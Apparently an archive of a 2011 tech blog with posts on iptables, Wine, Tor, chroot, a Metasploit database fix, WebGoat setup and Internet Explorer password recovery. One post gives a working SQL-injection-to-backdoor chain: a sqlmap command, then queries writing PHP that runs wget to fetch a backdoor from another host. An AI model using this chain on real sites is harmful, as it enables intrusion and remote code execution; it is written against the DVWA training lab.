The Best Code: 2011

Saturday, November 12, 2011

Setting Linux Firewall

IPtbles is an administrator tool for filtering and configuring network. These options specify the desired action to perform. Only one of them can be specified on the command line unless otherwise stated below. For long versions of the command and option names, you need to use only enough letters to ensure that iptables can differentiate it from all other options.

-A, --append chain rule-specification

Append one or more rules to the end of the selected chain. When the source and/or destination names resolve to more than one address, a rule will be added for each possible address combination.

-D, --delete chain rule-specification

-D, --delete chain rulenum

Delete one or more rules from the selected chain. There are two versions of this command: the rule can be specified as a number in the chain (starting at 1 for the first rule) or a rule to match.

-I, --insert chain [rulenum] rule-specification

Insert one or more rules in the selected chain as the given rule number. So, if the rule number is 1, the rule or rules are inserted at the head of the chain. This is also the default if no rule number is specified.

-R, --replace chain rulenum rule-specification

Replace a rule in the selected chain. If the source and/or destination names resolve to multiple addresses, the command will fail. Rules are numbered starting at 1.

-L, --list [chain]

List all rules in the selected chain. If no chain is selected, all chains are listed. Like every other iptables

command, it applies to the specified table (filter is the default), so NAT rules get listed by

iptables -t nat -n -L

Please note that it is often used with the -n option, in order to avoid long reverse DNS lookups. It is legal to specify the -Z (zero) option as well, in which case the chain(s) will be atomically listed and zeroed. The exact output is affected by the other arguments given. The exact rules are suppressed until you use

iptables -L -v

exemple :

for drop packet to our ip :

iptables -D INPUT -s 127.0.0.1 -p icmp -j DROP

for allowing trafic to web or tcp :

   iptables -A INPUT -p tcp --dport 80 -j ACCEPT

for cheking our rules:

   iptables -L

for flasing our rules:

   iptables -F

Saturday, November 5, 2011

GetGo Download Manager

Free Complete Online Video, Music and File Download Manager with Download Support. This Free Downloader is an Essential Internet Tool for Increasing Download Speed, Resuming, Scheduling, and Organizing Downloads. Easy to use, customizable modern interface allows you to Download All of your favorite videos, program, games, and music with extreme acceleration. With auto-resuming feature, you never have to waste your frustrations on unfinished downloads due to network problems, or unexpected power outages.

Highlights

IE & Firefox Integrated
Seamlessly integrated with IE and Firefox web browsers, GetGo can run in the background without interrupting your web browsing experience while downloading.

Easy Batch Download
You can easily set up a Batch Download that not only downloads a large list of files using an URL pattern template, but also automatically renames downloaded files using a filename pattern template.

Extreme Download Acceleration
GetGo accelerates download speed by splitting files into many blocks and then downloading them concurrently, which can result an increase in download speed up to 500%!

Flexible Download Scheduler
With GetGo's flexible download scheduler, you can schedule your downloads to start on timer or a specific date, and to download for a specific amount of time before stopping.

Resume Broken Downloads
GetGo resumes broken or stopped downloads, such that you won't need to restart your downloads from the beginning again, saving your time and bandwidth.

Wednesday, November 2, 2011

Wine windows software emulator

Wine is a free software application that aims to allow computer programs written for Microsoft Windows to run on Unix-like operating systems. Wine also provides a software library, known as Winelib, against which developers can compile Windows applications to help port them to Unix-like systems.

Wine is both an emulator and a compatibility layer. It duplicates functions of a Windows computer by providing alternative implementations of the DLLsthat Windows programs call, and a process to substitute for the Windows NT kernel. This method of duplication differs from other methods that might also be considered emulation, where Windows programs run in a virtual machine. Wine is predominantly written using black-box testing reverse-engineering, to avoid copyright issues.

The name Wine initially was an acronym for WINdows Emulator. Its meaning later shifted to the recursive backronym, Wine Is Not an Emulator in order to differentiate the software from other emulators. While the name sometimes appears in the forms WINE and wine, the project developers have agreed to standardize on the form Wine.

In a 2007 survey by desktoplinux.com of 38,500 Linux desktop users, 31.5% of respondents reported using Wine to run Windows applications. This plurality was larger than all x86 virtualization programs combined, as well as larger than the 27.9% who reported not running Windows applications.

Malwarebytes Anti-Malware

Malwarebytes Anti-Malware is a surprisingly effective freeware antimalware tool. It's a relatively speedy malware remover, with the quick scan taking about 8 minutes even with other high-resource programs running. The heuristics engine proved on multiple computers during empirical testing that it was capable of determining the difference between false positives and dangerous apps.

The app has some nice features rolled in, too. It supports multiple drive scanning including networked drives, context menu options including a scan-on-demand for individual files, and the FileAssassin option under the More Tools section for removing locked files. The interface is simple, but pleasant-looking and well-organized. Tabs live just below the oversized logo, with few options per tab to keep down the clutter. The installation process was fast enough, but interestingly offered up the well-kept changelog and an instant definition file update.

Do note that the real-time protection is restricted to the paid version, as is the scheduler for updates and scans. Overall, though, Malwarebytes Anti-Malware is a responsive malware remover that does what it should with a minimum of fuss.

download here.

reff:download.cnet.com

Iptables

Iptables is used to set up, maintain, and inspect the tables of IPv4 packet filter rules in the Linux kernel. Several different tables may be defined. Each table contains a num‐ber of built-in chains and may also contain user-defined chains.

Each chain is a list of rules which can match a set of packets. Each rule specifies what to do with a packet that matches. This is called a `target', which may be a jump to a user-defined chain in the same table.

A firewall rule specifies criteria for a packet and a target. If the packet does not match, the next rule in the chain is the examined; if it does match, then the next rule is specified by the value of the target, which can be the name of a user-defined chain or one of the special values ACCEPT, DROP, QUEUE or RETURN.

ACCEPT means to let the packet through. DROP means to drop the packet on the floor. QUEUE means to pass the packet to userspace. (How the packet can be received by a userspace process differs by the particular queue handler. 2.4.x and 2.6.x kernels up to 2.6.13 include the ip_queue queue handler. Kernels 2.6.14 and later additionally include the nfnetlink_queue queue handler. Packets with a target of QUEUE will be sent to queue number '0' in this case. Please also see the NFQUEUE target as described later in this man page.) RETURN means stop traversing this chain and resume at the next rule in the previous (calling) chain. If the end of a built-in chain is reached or a rule in a built-inchain with target RETURN is matched, the target specified by the chain policy determines the fate of the packet.

Example:

iptables -A PREROUTING -t mangle -i eth1 -m cluster --cluster-total-nodes 2 --cluster-local-node 1 --cluster-hash-seed 0xdeadbeef -j MARK --set-mark 0xffff

iptables -A PREROUTING -t mangle -i eth2 -m cluster --cluster-total-nodes 2 --cluster-local-node 1 --cluster-hash-seed 0xdeadbeef -j MARK --set-mark 0xffff

iptables -A PREROUTING -t mangle -i eth1 -m mark ! --mark 0xffff -j DROP

iptables -A PREROUTING -t mangle -i eth2 -m mark ! --mark 0xffff -j DROP

And the following commands to make all nodes see the same packets:

ip maddr add 01:00:5e:00:01:01 dev eth1

ip maddr add 01:00:5e:00:01:02 dev eth2

arptables -A OUTPUT -o eth1 --h-length 6 -j mangle --mangle-mac-s 01:00:5e:00:01:01

arptables -A INPUT -i eth1 --h-length 6 --destination-mac 01:00:5e:00:01:01 -j mangle --mangle-mac-d 00:zz:yy:xx:5a:27

arptables -A OUTPUT -o eth2 --h-length 6 -j mangle --mangle-mac-s 01:00:5e:00:01:02

arptables -A INPUT -i eth2 --h-length 6 --destination-mac 01:00:5e:00:01:02 -j mangle --mangle-mac-d 00:zz:yy:xx:5a:27

In the case of TCP connections, pickup facility has to be disabled to avoid marking TCP ACK packets coming in the reply direction as valid.

echo 0 > /proc/sys/net/netfilter/nf_conntrack_tcp_loose

Fix Metasploit Error After Update

If you are found this error :

root@bt:~# msfconsole

[-] Failed to connect to the database: could not connect to server: Connection refused

Is the server running on host "127.0.0.1" and accepting

TCP/IP connections on port 7175?

{"adapter"=>"postgresql", "database"=>"msf3", "username"=>"msf3", "password"=>"259959f7", "host"=>"127.0.0.1", "port"=>7175, "pool"=>75, "timeout"=>5} ["/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:968:in `initialize'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:968:in `new'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:968:in `connect'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:217:in `initialize'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:37:in `new'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:37:in `postgresql_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:223:in `new_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:245:in `checkout_new_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:188:in `block (2 levels) in checkout'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:184:in `loop'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:184:in `block in checkout'", "/opt/framework/ruby/lib/ruby/1.9.1/monitor.rb:201:in `mon_synchronize'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:183:in `checkout'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:98:in `connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:326:in `retrieve_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_specification.rb:123:in `retrieve_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_specification.rb:115:in `connection'", "/opt/framework/msf3/lib/active_record/base.rb:1271:in `columns'", "/opt/framework/msf3/lib/active_record/base.rb:1284:in `column_names'", "/opt/framework/msf3/lib/active_record/base.rb:1297:in `column_methods_hash'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `block in all_attributes_exists?'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `each'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `all?'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `all_attributes_exists?'", "/opt/framework/msf3/lib/active_record/base.rb:1842:in `method_missing'", "/opt/framework/msf3/lib/msf/core/model/workspace.rb:69:in `default'", "/opt/framework/msf3/lib/msf/core/db.rb:189:in `default_workspace'", "/opt/framework/msf3/lib/msf/core/db_manager.rb:161:in `connect'", "/opt/framework/msf3/lib/msf/ui/console/driver.rb:190:in `initialize'", "/opt/framework/msf3/msfconsole:130:in `new'", "/opt/framework/msf3/msfconsole:130:in `<main>'"]

don't panic, because that problem can be fixed with this case :

rm /opt/framework/postgresql/data/postmaster.pid

rm /opt/framework/postgresql/.s.PGSQL.7175

rm /opt/framework/postgresql/.s.PGSQL.7175.lock

/etc/init.d/framework-postgres start

After that, open msfconsole :

root@bt:~# msfconsole

NOTICE: CREATE TABLE will create implicit sequence "mod_refs_id_seq" for serial column "mod_refs.id"

NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "mod_refs_pkey" for table "mod_refs"

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

Trace program: running

wake up, Neo...

the matrix has you

follow the white rabbit.

knock, knock, Neo.

(`. ,-,

` `. ,;' /

`. ,'/ .'

`. X /.'

.-;--''--.._` ` (

.' / `

, ` ' Q '

, , `._ \

,.| ' `-.;_'

: . ` ; ` ` --,.._;

' ` , ) .'

`._ , ' /_

; ,''-,;' ``-

``-..__``--`

=[ metasploit v4.1.2-dev [core:4.1 api:1.0]

+ -- --=[ 755 exploits - 397 auxiliary - 109 post

+ -- --=[ 228 payloads - 27 encoders - 8 nops

=[ svn r14141 updated today (2011.11.02)

our metasploit has been fixed .

Good luck !!

Tuesday, November 1, 2011

Crossover, windows emulator for linux

crossover allow you to install many windows aplication in linux operating sistem.You can think of it as an emulator, but it's different, because there's no Windows OS license required. Your applications integrate seamlessly in OS X or Linux; just click and run. No rebooting, no switching to a virtual machine, and no Windows Operating System license required!
Adding new Windows software is easy. Just place your install CD in your machine, and CrossOver will recognize it and offer to install it. Once installed, CrossOver will configure your application to run on your computer. That's all there is to it.
CrossOver is capable of running a range of Windows software. To see if your favorite application is supported, please check ourCrossOver Compatibility Center, or search for them using the search box at the top of this page.

Gparted tool partition

Setting Gparted :

Download the GParted Live zip file.
If you already have a FAT16 or FAT32 partition on your USB flash drive then skip to the next step (3).
Otherwise prepare at least a 200 MB partition formatted with either a FAT16 or FAT32 file system.
If the USB flash drive or USB hard drive does not have any partition, you can use a partitioning tool (e.g. gparted, parted, fdisk, cfdisk or sfdisk) to create a partition with a size of 200 MB or more.
Here we assume your USB flash drive or USB hard drive is /dev/sdd (You have to comfirm your device name, since it's _NOT_ always /dev/sdd) on your GNU/Linux, so the partition table is like:
```
# fdisk -l /dev/sdd
      Disk /dev/sdd: 12.8 GB, 12884901888 bytes
      15 heads, 63 sectors/track, 26630 cylinders
      Units = cylinders of 945 * 512 = 483840 bytes
      Disk identifier: 0x000c2aa7

         Device Boot      Start         End      Blocks   Id  System
         /dev/sdd1   *           1       26630    12582643+   b  W95 FAT32
    
```
Then format the partition as FAT with a command such as "mkfs.vfat -F 32 /dev/sdd1"
WARNING! Executing the mkfs.vfat command on the wrong partition or device could cause your GNU/Linux not to boot. Be sure to confirm the command before you run it.
```
# mkfs.vfat -F 32 /dev/sdd1
      mkfs.vfat 2.11 (12 Mar 2005)
    
```
Insert your USB flash drive or USB hard drive into the USB port on your Linux machine and wait a few seconds. Next, run the command "dmesg" to query the device name of the USB flash drive or USB hard drive. Let's say, for example, that you find it is /dev/sdd1. In this example, we assume /dev/sdd1 has FAT filesystem, and it is automatically mounted in dir /media/usb/. If it's not automatically mounted, manually mount it with commands such as "mkdir -p /media/usb; mount /dev/sdd1 /media/usb/".
Unzip all the files and copy them into your USB flash drive or USB hard drive. You can do this with a command such as: "unzip gparted-live-0.4.5-2.zip -d /media/usb/"). Keep the directory architecture, for example, file "COPYING" should be in the USB flash drive or USB hard drive's top directory (e.g. /media/usb/COPYING).
To make your USB flash drive bootable, first change the working dir, e.g. "cd /media/usb/utils/linux", then run "bash makeboot.sh /dev/sdd1" (replace /dev/sdd1 with your USB flash drive device name), and follow the prompts.
WARNING! Executing makeboot.sh with the wrong device name could cause your GNU/Linux not to boot. Be sure to confirm the command before you run it.

NOTE: There is a known problem if you run makeboot.sh on Debian Etch, since the program utils/linux/syslinux does not work properly. Make sure you run it on newer GNU/Linux, such as Debian Lenny, Ubuntu 8.04, or Fedora 9

reff:http://gparted.sourceforge.net

Tor (anonymity network)

Tor (short for The Onion Router) is a system intended to enable online anonymity. Tor client software routes Internet traffic through a worldwide volunteer network of servers in order to conceal a user's location or usage from someone conducting network surveillance or traffic analysis. Using Tor makes it more difficult to trace Internet activity, including "visits to Web sites, online posts, instant messages and other communication forms", to the user. It is intended to protect users' personal freedom, privacy, and ability to conduct confidential business by keeping their internet activities from being monitored. "Onion routing" refers to the layered nature of the encryption service: The original data are encrypted and re-encrypted multiple times, then sent through successive Tor relays, each one of which decrypts a "layer" of encryption before passing the data on to the next relay and ultimately the destination. This reduces the possibility of the original data being unscrambled or understood in transit. The software is a free-software and the network is free of charge to use.
Operation

Tor aims to conceal its users' identities and their network activity from surveillance and traffic analysis by separating identification and routing. It is an implementation of onion routing, which encrypts and then randomly bounces communications through a network of relays run by volunteers throughout the globe. These onion routers employ encryption in a multi-layered manner (hence the onion metaphor) to ensure perfect forward secrecy between relays, thereby providing users with anonymity in network location. That anonymity extends to the hosting of censorship-resistant content via Tor's anonymous hidden service feature. By keeping some of the entry relays secret (bridge relays), users can evade Internet censorship that relies upon blocking public Tor relays.

Because the internet address of the sender and the recipient are not both in cleartext at any hop along the way (and at middle relays neither piece of information is in cleartext), someone eavesdropping at any point along the communication channel cannot directly identify both ends. Furthermore, to the recipient it appears that the last Tor node (exit relay) is the originator of the communication rather than the sender.

Originating trafic

Users of a Tor network run an onion proxy on their machine. The Tor software periodically negotiates a virtual circuit through the Tor network, using multi-layer encryption, ensuring perfect forward secrecy. At the same time, the onion proxy software presents a SOCKS interface to its clients. SOCKS-aware applications may be pointed at Tor, which then multiplexes the traffic through a Tor virtual circuit. The Polipo proxy server can speak the SOCKS 4 & SOCKS 5 protocols and therefore is recommended to be used together with the Tor anonymising network. Polipo is a web proxy that does HTTP 1.1 pipelining well, so it can enhance Tor's communication latency.

Once inside a Tor network, the traffic is sent from router to router, ultimately reaching an exit node at which point the cleartext packet is available and is forwarded on to its original destination. Viewed from the destination, the traffic appears to originate at the Tor exit node.

Tor's application independence sets it apart from most other anonymity networks: it works at the Transmission Control Protocol (TCP) stream level. Applications whose traffic is commonly anonymised using Tor include Internet Relay Chat (IRC), instant messaging and World Wide Web browsing. When browsing the Web, Tor is often coupled with Polipo or Privoxy proxy servers. Privoxy is a filteringproxy server that aims to add privacy at the application layer. Polipo can speak the SOCKS protocol and does HTTP 1.1 pipelining for enhancing latencies, therefore is now recommended to be used together with the Tor anonymising network by the torproject.org.

On older versions of Tor (resolved May–July 2010), as with many anonymous web surfing systems, direct Domain Name System (DNS) requests are usually still performed by many applications, without using a Tor proxy. This allows someone monitoring a user's connection to determine (for example) which WWW sites they are viewing using Tor, even though they cannot see the content being viewed. Using Privoxy or the command "torify" included with a Tor distribution is a possible solution to this problem.Additionally, applications using SOCKS5 – which supports name-based proxy requests – can route DNS requests through Tor, having lookups performed at the exit node and thus receiving the same anonymity as other Tor traffic.

As of Tor release 0.2.0.1-alpha, Tor includes its own DNS resolver which will dispatch queries over the mix network. This should close the DNS leak and can interact with Tor's address mapping facilities to provide the Tor hidden service (.onion) access to non-SOCKS-aware applications.

reff:ww.en.wikipedia.org

The power of "chroot"

A chroot is a way of isolating applications from the rest of your computer, by putting them in a jail. This is particularly useful if you are testing an application which could potentially alter important system files, or which may be insecure.

Creating a chroot

This section provides instructions on creating a basic chroot. For more advanced chroots.

Install the dchroot and debootstrap packages.
As an administrator (i.e. using sudo), create a new directory for the chroot. In this procedure, the directory /var/chroot will be used. To do this, type sudo mkdir /var/chroot into a command line.
As an administrator, open /etc/schroot/schroot.conf in a text editor. Type cd /etc/schroot, followed bygksu gedit schroot.conf. This will allow you to edit the file.

Add the following lines into schroot.conf and then save and close the file. Replace your_username with your username.

[lucid]
description=Ubuntu Lucid
location=/var/chroot
priority=3
users=your_username
groups=sbuild
root-groups=root

Open a terminal and type:
- ```
sudo debootstrap --variant=buildd --arch i386 lucid /var/chroot/ http://mirror.url.com/ubuntu/
```
This will create a basic 'installation' of Ubuntu 10.04 (Lucid Lynx) in the chroot. It may take a while for the packages to be downloaded.
Note: You can replace lucid with the Ubuntu version of your choice.
Note: You must change the above mirror.url.com with the URL of a valid archive mirror local to you.
A basic chroot should now have been created. Type sudo chroot /var/chroot to change to a root shell inside the chroot.

Setting-up the chroot

There are some basic steps you can take to set-up the chroot, providing facilities such as DNS resolution and access to /proc.

Note: Type these commands in a shell which is outside the chroot.

Type the following to mount the /proc filesystem in the chroot (required for managing processes):
- ```
sudo mount -o bind /proc /var/chroot/proc
```
Type the following to allow DNS resolution from within the chroot (required for Internet access):
- ```
sudo cp /etc/resolv.conf /var/chroot/etc/resolv.conf
```

Very few packages are installed by default in a chroot (even sudo isn't installed). Use apt-get install package_name to install packages.

See Debootstrap Chroot and Installing Mandriva Linux in a Chroot for more advanced set-up instructions.

Accessing graphical applications inside the chroot

You can run graphical applications within a chroot, but you need to provide an X server for them to run in first. The easiest way to do this is to set the display of the chroot system to be identical to the root display of your system's main X server.

In other words, in the chroot shell type

export DISPLAY=:0.0

Any X command you type will now get its own window as you're used to, but as it is running inside the chroot jail it will not be able to see your normal file system.

You don't have to enter the chroot shell to access its commands. Suppose you want to run Firefox in a chroot jail in order to avoid security problems with signed Java applets and other components which otherwise would have access to your personal files. You can do this by running the command

gksudo chroot /var/chroot firefox -DISPLAY=:0.0

This command can also be invoked from the menu, or a panel applet or desktop shortcut.

If you want the chroot to have its own display, you need to create this display with the Xnest command. Perform the following instructions outside the chroot:

Install the xhost and xnest packages.
Ensure that /proc is mounted and DNS resolution is set-up within the chroot (see above).
Type the following into a Terminal:
- ```
Xnest -ac :1
```
A blank Xnest window should appear.
Open another Terminal and type the following to enter the chroot:
- ```
sudo chroot /var/chroot
```
While in the chroot shell, type the following:
- ```
export DISPLAY=localhost:1
```
  If you have problems starting graphical applications, type the above command again, but replace localhost with127.0.0.1
Start a window manager inside the chroot. For example, install the metacity package and type:
- ```
metacity &
```
Start a graphical application inside the chroot (making sure that you installed it in the chroot first). It should appear in the Xnest window.

You can install a complete Ubuntu desktop in the chroot by installing the ubuntu-desktop package. GNOME can be started from the command line by running the gnome-session command.

Kismet

Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and Mac OS X. The client can also run on Microsoft Windows, although, aside from external drones, there's only one supported wireless hardware available as packet source.

Kismet is unlike most other wireless network detectors in that it works passively. This means that without sending any loggable packets, it is able to detect the presence of both wireless access points and wireless clients, and associate them with each other.

Kismet also includes basic wireless IDS features such as detecting active wireless sniffing programs including NetStumbler, as well as a number of wireless network attacks.
Kismet has the ability to log all sniffed packets and save them in a tcpdump/Wireshark or Airsnort compatible fileformat. Kismet also captures PPI headers.
Kismet also has the ability to detect default or "not configured" networks, probe requests, and determine what levels of wireless encryptions is used on a given access point.
To find as many networks as possible, kismet supports channelhopping. This means that it constantly changes from channel to channel non-sequentially, in a user-defined sequence with a default value that leaves big holes between channels (for example 1-6-11-2-7-12-3-8-13-4-9-14-5-10). The advantage with this method is that it will capture more packets because adjacent channels overlap.
Kismet also supports logging of the geographical coordinates of the network if the input from a GPS receiver is additionally available.

Sunday, October 30, 2011

How to install webgoat in backtrack

WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson.

1. Before installing firs download webgoat from this link .
2. To extract the file format 7zip, install p7zip by :
apt-get install p7zip
3. Now extract webgoat file :
p7zip -d WebGoat-OWASP_Standard-5.3_RC1.7z
4. if the extract has been completed, go into the folder extract :
cd WebGoat-OWASP_Standard-5.3_RC1
5. change the file permissions webgoat.sh to be executable by this commant :
chmod +x webgoat.sh
6. webgoat need to run the OpenJDK-6-jre and openjdk-6-jdk, and to get it can use the following command :
apt-get install openjdk-6-jre openjdk-6-jdk
7. After installation is now ready to run webgoat on port 80 or 8080 by this commant:
./webgoat.sh start80 or ./webgoat star8080

Now we can open webgoat from browser bay this url http://127.0.0.1/webgoat/attack

Generate backdoor from SQL injection

To create backdoor from sql injection, the web must be vulnerable with sql injection. then we find the password for mysql database, that can be do with some tecnique, like social enginering or scanning with sqlmap, for exemple :

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="Cookie: security=high; PHPSESSID=5c0eecdbcf2a5acdee16c2b389be67e4" --password

after we got the password, now we enter to mysql with the following sintax:

root@bt:/pentest/database/sqlmap# mysql -h [host ip] -u root -p

then press enter and input the password we got.
now we on my sql shell, and from here we can create database and create backdoor. this sample sintax to download backdoor from other web :

mysql> select "<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/bad.php' --;
Query OK, 1 row affected (0.00 sec)

now we can acces "bad.php" , and after we acces it, the php syntak where in that well be execute and backdoor cn.txt well be uploded in dvwa directori and well be rename with bar.php
finally, we can acces bar.php in http:###.###.###.###/dvwa/bar.php

Other way :
we just insert the sql query to vulnerable form like this :

1' union select 1,"<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/a.php

and where we access the "a.php" file then "wget 192.168.56.1/cn.txt -O bar.php" well be executed and backdoor well be downloaded by server.

Saturday, May 14, 2011

Recovering Internet Explorer Passwords: Theory and Practice

Recovering Internet Explorer Passwords: Theory and Practice

1. Introduction
2. Types of passwords stored in Internet Explorer
2.1. Internet Credentials
2.2. AutoComplete data
2.3. AutoComplete passwords
2.4. FTP passwords
2.5. Synchronization passwords
2.6. Identities passwords
2.7. AutoForms data
2.8. Content Advisor password
3. Brief overview of Internet Explorer password recovery programs
4. PIEPR - the first acquaintance
5. Three real-life examples
5.1. Recovering current user's FTP passwords
5.2. Recovering website passwords from unloadable operating system
5.3. Recovering uncommonly stored passwords
6. Conclusion

1. Introduction
Nobody will likely dispute the fact that Internet Explorer is today's most popular Web browser. According to the statistics, approximately 70% of online users prefer to use just this program. Arguments about its pros and cons may last forever; still, this browser is the leader of its industry, and this is a fact that requires no proof. Internet Explorer carries several built-in technologies, designed to make average user's life easier. One of them - IntelliSense - is made for taking care of the routine tasks, like the automatic completion of visited webpage addresses, automatic filling of form fields, users' passwords, etc.

Many of today's websites require registration, which means, user would have to enter user name and password. If you use more than a dozen of such websites, you will likely need a password manager. All modern browsers have a built-in password manager in their arsenal, and Internet Explorer is not an odd. Indeed, why would one have to remember yet another password if it is going to be forgotten some time soon anyway? Much easier would be to have browser do the routine work of remembering and storing passwords for you. It's convenient and comfortable.

This would be a totally perfect solution; however, if your Windows operating system crashed or reinstalled not the way it's supposed to be reinstalled, you can easily lose the entire list of your precious passwords. That's the toll for the comfort and convenience. It's good just about every website has a saving 'I forgot password' button. However, this button will not always take your headache from you.

Each software developer solves the forgotten password recovery problem their own way. Some of them officially recommend copying a couple of important files to another folder, while other send all registered users a special utility that allows managing the migration of private data, and the third ones pretend they are not seeing the problem. Nevertheless, the demand creates the offer, and password recovery programs are currently on a great demand.

In this article, let's try to classify types of private data stored in Internet Explorer, look at programs for the recovery of the data, and study real-life examples of recovering lost Internet passwords.

2. Types of passwords stored in Internet Explorer
- Internet Explorer may store the following types of passwords:
- Internet Credentials
- AutoComplete Data
- AutoComplete Passwords
- FTP Passwords
- Synchronization Passwords for cached websites
- Identities Passwords
- AutoForms Data
- Content Advisor Password
Let's take a closer look at each listed item.

2.1. Internet Credentials for websites
Internet credentials mean user's logins and passwords required for accessing certain websites, which are processed by the wininet.dll library. For example, when you try to enter the protected area of a website, you may see the following user name and password prompt (fig.1 http://www.passcape.com/images/ie01.png).

If the option 'Remember my password' is selected in that prompt, the user credentials will be saved to your local computer. The older versions of Windows 9a stored that data in user's PWL file; Windows 2000 and newer store it in the Protected Storage.

2.2. AutoComplete Data
AutoComplete data (passwords will be covered further) are also stored in the Protected Storage and appear as lists of HTML form field names and the corresponding user data. For example, if an HTML page contains an e-mail address entry dialog: once user has entered his e-mail address, the Protected Storage will have the HTML field name, the address value, and the time the record was last accessed.

The HTML page title and website address are not stored. Is that good or bad? It's difficult to determine; more likely to be good than bad. Here are the obvious pros: it saves free space and speeds up browser's performance. If you think the last note is insignificant, try to imagine how you would have to perform several extra checkups in a multi-thousand (this is not as rare as it may seem to be) auto-fill list.

Another obvious plus is that data for identical by name (and often by subject) HTML form fields will be stored in the same place, and the common data will be used for the automatic filling of such pages. We will see this by this example. If one HTML page contains an auto-fill field with the name 'email', and user entered his e-mail address in that field, IE will put in the storage, roughly, 'email=my@email.com'. From now on, if the user opens another website, which has a page with the same field name 'email', the user will be suggested to auto-fill it with the value that he entered on the first page (my@email.com). Thus, the browser somewhat discovers AI capabilities within itself.

The major drawback of this data storage method comes out of its advantage that we just described. Imagine, user has entered auto-fill data on a webpage. If someone knows the HTML form field name, that person can create his own simplest HTML page with the same field name and open it from a local disk. To uncover the data entered in this field, such person will not even have to connect to the Internet and open the original WWW address.

2.3. AutoComplete Passwords
In the case with passwords data, however, as you might have guessed, the data will not be filled in automatically. Since auto-complete passwords are stored along with the Web page name, and each password is bound to only one specific HTML page.

In the new version, Internet Explorer 7, both AutoComplete passwords and data are encrypted completely different; the new encryption method is free from the shortcoming just described (if that can be classified as a shortcoming.)

It is worth noticing that Internet Explorer allows users to manage auto-fill parameters manually, through the options menu (fig.2 http://www.passcape.com/images/ie02.png).

2.4. FTP passwords
FTP site passwords are stored pretty much the same way. It would be relevant to notice that beginning with Windows XP FTP passwords are additionally encrypted with DPAPI. This encryption method uses logon password. Naturally, this makes it much more difficult to recover such lost passwords manually, since now one would need to have the user's Master Key, SID and the account password.

Starting with Microsoft Windows 2000, the operating system began to provide a Data Protection Application-Programming Interface (DPAPI) API. This is simply a pair of function calls that provide OS-level data protection services to user and system processes. By OS-level, we mean a service that is provided by the operating system itself and does not require any additional libraries. By data protection, we mean a service that provides confidentiality of data through encryption. Since the data protection is part of the OS, every application can now secure data without needing any specific cryptographic code other than the necessary function calls to DPAPI. These calls are two simple functions with various options to modify DPAPI behavior. Overall, DPAPI is a very easy-to-use service that will benefit developers that must provide protection for sensitive application data, such as passwords and private keys.
DPAPI is a password-based data protection service: it requires a password to provide protection. The drawback, of course, is that all protection provided by DPAPI rests on the password provided. This is offset by DPAPI using proven cryptographic routines, specifically the strong Triple-DES and AES algorithms, and strong keys, which we'll cover in more detail later. Since DPAPI is focused on providing protection for users and requires a password to provide this protection, it logically uses the user's logon password for protection.
DPAPI is not responsible for storing the confidential information it protects. It is only responsible for encrypting and decrypting data for programs that call it, such as Windows Credential manager, the Private Key storage mechanism, or any third-party programs.
Please refer to Microsoft Web site for more information.

2.5. Synchronization Passwords for cached websites
Synchronization passwords free user from having to enter passwords for cached websites (sites set to be available offline.) Passwords of this type are also stored in IE's Protected Storage.

2.6. Identities passwords
So are identities passwords. The identity-based access management mechanism is not widespread in Microsoft's products, except, perhaps, Outlook Express.

2.7. AutoForms Data
A special paragraph must cover the form auto-fill method, which constitutes a hybrid way of storing data. This method stores the actual data in the Protected Storage, and the URL, which the data belong to, is stored in user's registry. The URL written in the registry is stored not as plaintext - it is stored as hash. Here is the algorithm for reading form auto-fill data in IE 4 - 6:

===8<===========Begin of original text===========
//Get autoform password by given URL
BOOL CAutoformDecrypter::LoadPasswords(LPCTSTR cszUrl, CStringArray *saPasswords)
{
assert(cszUrl && saPasswords);

saPasswords->RemoveAll();

//Check if autoform passwords are present in registry
if ( EntryPresent(cszUrl) )
{
//Read PStore autoform passwords
return PStoreReadAutoformPasswords(cszUrl,saPasswords);
}

return FALSE;
}

//Check if autoform passwords are present
BOOL CAutoformDecrypter::EntryPresent(LPCTSTR cszUrl)
{
assert(cszUrl);

DWORD dwRet, dwValue, dwSize=sizeof(dwValue);
LPCTSTR cszHash=GetHash(cszUrl);

//problems computing the hash
if ( !cszHash )
return FALSE;

//Check the registry
